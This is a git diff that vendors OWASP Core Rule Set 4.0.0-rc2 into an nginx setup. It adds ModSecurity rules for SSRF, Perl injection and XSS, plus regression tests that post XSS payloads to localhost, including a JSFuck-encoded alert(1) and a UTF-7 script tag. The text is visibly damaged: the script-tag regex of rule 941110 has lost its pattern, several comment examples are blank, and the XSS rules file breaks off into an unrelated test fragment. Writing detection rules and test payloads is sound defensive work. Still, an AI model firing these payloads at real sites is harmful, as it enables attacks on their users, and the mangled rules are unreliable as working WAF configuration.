5}(?:#?[\s\v]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\--\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\xe2(?:\x91[\xa0-\xbf]|\x92[\x80-\xbf]|\x93[\x80-\xa9\xab-\xbf])|\xe3\x80\x82)+))" \ + "id:934120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: URL Parameter using IP 
Address',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-ssrf',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/225/664',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+# [ Perl generic RCE signatures ]
+#
+# Detects Perl-based injection attacks.
+# Example: @{[system whoami]}
+#
+# Regular expression generated from regex-assembly/934140.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 934140
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx @\{.*\}" \
+ "id:934140,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Perl Injection Attack',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-perl',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'attack-injection-generic',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+#
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
+#
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-934-APPLICATION-ATTACK-GENERIC" diff --git a/nginx/config/owasp-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/nginx/config/owasp-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf new file mode 100644 index 00000000..22244e3c --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf 
@@ -0,0 +1,1070 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+
+# In CRS v4.0, we have added REQUEST_FILENAME to the list of variables to
+# be checked for XSS to catch path-based XSS exploits such as:
+# /index.php/%3Csvg/onload=alert()
+#
+# However, the REQUEST_FILENAME is always populated (while ARGS etc. are
+# only set on some requests) and we found that always checking the
+# REQUEST_FILENAME has a significant performance impact.
+# Therefore, we are disabling the REQUEST_FILENAME XSS checks when the
+# REQUEST_FILENAME is clearly not containing special characters necessary
+# for a successful XSS.
+#
+# Some bona-fide REQUEST_FILENAMEs will still contain special characters
+# and will be checked by the rules, but it will be a much lower amount,
+# and that is a trade-off we are willing to make.
+#
+# So, we check for XSS in REQUEST_FILENAME only if it contains
+# other characters than alphanumeric characters, hyphens, underscores etc.
+# typically found in filenames and paths:
+#
+# - ascii 20 (whitespace)
+# - ascii 45-47 (- . 
/)
+# - ascii 48-57 (0-9)
+# - ascii 65-90 (A-Z)
+# - ascii 95 (underscore)
+# - ascii 97-122 (a-z)
+#
+# If just these characters are present, we make use of a special tag to remove
+# REQUEST_FILENAME from the target list of all the 941xxx rules starting 941100.
+#
+# Please note that it would be preferable to start without REQUEST_FILENAME in the
+# target list and to add it on a case to case base, but the rule language does not
+# support this feature at runtime.
+#
+SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122" \
+ "id:941010,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME"
+
+
+#
+# -=[ Libinjection - XSS Detection ]=-
+#
+# Ref: https://github.com/client9/libinjection
+# Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss
+#
+# -=[ Targets ]=-
+#
+# 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|
+# REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|
+# ARGS_NAMES|ARGS|XML:/*
+#
+# 941101: PL2 : REQUEST_FILENAME|REQUEST_HEADERS:Referer
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \
+ "id:941100,\
+ phase:2,\
+ block,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
+ msg:'XSS Attack Detected via libinjection',\
+ logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-xss',\
+ tag:'xss-perf-disable',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ XSS Filters - Category 1 ]=-
+# http://xssplayground.net23.net/xssfilter.html
+# script tag based XSS vectors, e.g., 
+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ + "id:941110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 1: Script Tag Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 3 ]=- +# +# Regular expression generated from regex-assembly/941130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941130 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i).(?:\b(?:x(?:link:href|html|mlns)|data:text/html|formaction|pattern\b.*?=)|!ENTITY[\s\v]+(?:%[\s\v]+)?[^\s\v]+[\s\v]+(?:SYSTEM|PUBLIC)|@import|;base64)\b" \ + "id:941130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 3: Attribute Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + 
severity:'CRITICAL',\
+ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ XSS Filters - Category 4 ]=-
+# XSS vectors making use of javascript uri and tags, e.g.,

+# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#css-expressions-ie7
+# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#behaviors-for-older-modes-of-ie
+# examples: https://regex101.com/r/FFEpsh/1
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[a-z]+=(?:[^:=]+:.+;)*?[^:=]+:url\(javascript" \
+ "id:941140,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,t:removeWhitespace,\
+ msg:'XSS Filter - Category 4: Javascript URI Vector',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-xss',\
+ tag:'xss-perf-disable',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ NoScript XSS Filters ]=-
+# Ref: http://noscript.net/
+#
+# [NoScript InjectionChecker] HTML injection
+#
+# Regular expression generated from regex-assembly/941160.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941160 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\v\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\v/]|[\"'](?:.*[\s\v/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(
?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:
ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|transitionend)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f-\r ]*?=" \ + "id:941160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: HTML Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [NoScript InjectionChecker] Attributes injection +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx 
(?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\x5c\(\[\.<]|[\s\S]*?(?:\bname\b|\x5c[ux]\d))|data:(?:(?:[a-z]\w+/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|[^-]*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[^:]*?:\W*?u\W*?r\W*?l[\s\S]*?\(" \ + "id:941170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: Attribute Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [Deny List Keywords from Node-Validator] +# https://github.com/validatorjs/validator.js/ +# This rule has a stricter sibling 941181 (PL2) that covers the additional payload "-->" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@pm document.cookie document.domain document.write .parentnode .innerhtml window.location -moz-binding " \ + "id:941181,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,\ + msg:'Node-Validator Deny List Keywords',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + 
severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# -=[ XSS Filters from IE ]=- + +# Detect tags that are the most common direct HTML injection points. +# +# +# +# +# " + output: + log_contains: id "941330" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml new file mode 100644 index 00000000..44f60d45 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941340.yaml +tests: + - test_title: 941340-1 + desc: "IE XSS Filters - Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_title: 941340-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml new file mode 100644 index 00000000..75721a2a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml 
@@ -0,0 +1,22 @@
+---
+meta:
+ author: fgsch
+ enabled: true
+ name: 941350.yaml
+ description: Test rule 941350
+tests:
+ - test_title: 941350-1
+ desc: GH issue 1514
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: /xx?id=%252bADw-script%252bAD4-
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ output:
+ log_contains: id "941350"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
new file mode 100644
index 00000000..3f2e77f3
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
@@ -0,0 +1,58 @@ +--- +meta: + author: "Christian Folini" + description: None + enabled: true + name: 941360.yaml +tests: + - test_title: 941360-1 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-2 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-3 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml new file 